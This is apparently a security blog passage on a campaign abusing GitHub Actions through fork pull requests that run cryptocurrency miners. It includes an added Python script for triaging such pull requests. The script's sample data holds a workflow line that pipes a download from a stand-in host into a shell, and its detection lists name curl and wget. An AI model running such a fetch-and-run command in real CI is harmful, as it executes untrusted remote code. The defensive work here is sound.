Recently, attackers have been abusing GitHub's continuous integration/continuous delivery (CI/CD) feature, GitHub Actions, to get unauthorized cryptocurrency miners run against repositories. The attacker forks a repository, adds the miner to the fork, and then opens a very large number of pull requests back to the upstream repositories with the miner included, so that the CI runs triggered by those pull requests execute the mining payload. The attackers are using the Monero miner XMRig and a miner known as npm.exe (no relation to Node.js). As of right now, 90+ known repositories are being targeted, but how effective the campaign is remains to be seen: diligent maintainers who carefully check the details of the code changes in a pull request before accepting it will notice that something suspicious is going on.
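The defensive check the paragraph relies on (reviewing what a pull request actually changes before letting it run or merging it) can be partly automated. The script below is an added example, not code from the original article or from GitHub: it triages a pull request's changed-file list and flags the signals described above, namely edits to CI workflow definitions, workflow lines that fetch and execute a payload, and newly added binaries named like the miners mentioned (xmrig, npm.exe), with extra weight when the pull request comes from a fork. The `ChangedFile`/`PullRequest` data shapes, the heuristic marker lists, and the sample pull requests are all constructed assumptions for illustration, not the GitHub API schema.

```python
"""Pull-request triage for CI-abuse signals (added example, not the article's code).

Data model and heuristics are assumptions for illustration; the sample pull
requests at the bottom are constructed, not real GitHub data.
"""
from dataclasses import dataclass, field
from typing import List

WORKFLOW_DIR = ".github/workflows/"
# Miner names taken from the article, lower-cased for comparison.
KNOWN_MINER_NAMES = {"xmrig", "xmrig.exe", "npm.exe"}
# Extensions a source-code PR normally has no reason to add (heuristic).
BINARY_EXTENSIONS = (".exe", ".dll", ".so", ".bin")
# Workflow step content that downloads and runs arbitrary payloads (heuristic).
FETCH_AND_RUN_MARKERS = ("curl ", "wget ", "chmod +x", "invoke-webrequest")


@dataclass
class ChangedFile:
    path: str
    status: str  # "added", "modified" or "removed" (assumed vocabulary)
    added_lines: List[str] = field(default_factory=list)


@dataclass
class PullRequest:
    number: int
    from_fork: bool
    files: List[ChangedFile]


def triage_pull_request(pr: PullRequest) -> List[str]:
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings: List[str] = []
    workflow_touched = False

    for f in pr.files:
        basename = f.path.rsplit("/", 1)[-1].lower()

        # 1. Any surviving change to CI workflow definitions is worth a close look.
        if f.path.startswith(WORKFLOW_DIR) and f.status != "removed":
            workflow_touched = True
            findings.append(f"workflow file changed: {f.path}")
            # 2. Added workflow lines that fetch and execute something at run time.
            for line in f.added_lines:
                if any(marker in line.lower() for marker in FETCH_AND_RUN_MARKERS):
                    findings.append(
                        f"workflow fetches/executes a payload: {line.strip()}")
                    break

        # 3. Newly added binaries, especially ones matching the named miners.
        if f.status == "added":
            if basename in KNOWN_MINER_NAMES:
                findings.append(f"known miner binary added: {f.path}")
            elif basename.endswith(BINARY_EXTENSIONS):
                findings.append(f"binary artifact added: {f.path}")

    # A fork-originated PR that rewrites CI is the exact pattern described.
    if pr.from_fork and workflow_touched:
        findings.append("HIGH: fork PR modifies CI workflows; review before any run")
    return findings


# Constructed sample resembling the campaign: fork PR, workflow edit, miner binary.
SUSPICIOUS_PR = PullRequest(
    number=4242,  # constructed
    from_fork=True,
    files=[
        ChangedFile(".github/workflows/ci.yml", "modified",
                    ["      - run: curl -sL https://example.invalid/setup.sh | sh"]),
        ChangedFile("tools/npm.exe", "added"),
        ChangedFile("README.md", "modified", ["Fix a typo in the install section"]),
    ],
)

# Constructed benign sample: in-repo branch touching only source code.
BENIGN_PR = PullRequest(
    number=4243,  # constructed
    from_fork=False,
    files=[ChangedFile("src/app.py", "modified", ["    return value + 1"])],
)

if __name__ == "__main__":
    for pr in (SUSPICIOUS_PR, BENIGN_PR):
        print(f"PR #{pr.number}: {triage_pull_request(pr) or ['no findings']}")
```

Wiring this to real data means filling `PullRequest` from whatever pull-request file listing your hosting platform exposes; the heuristics are deliberately simple and are a prompt for human review, not a replacement for it.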
Written by: Nataliia Zdrok, Threat Intelligence Analyst at Binary Defense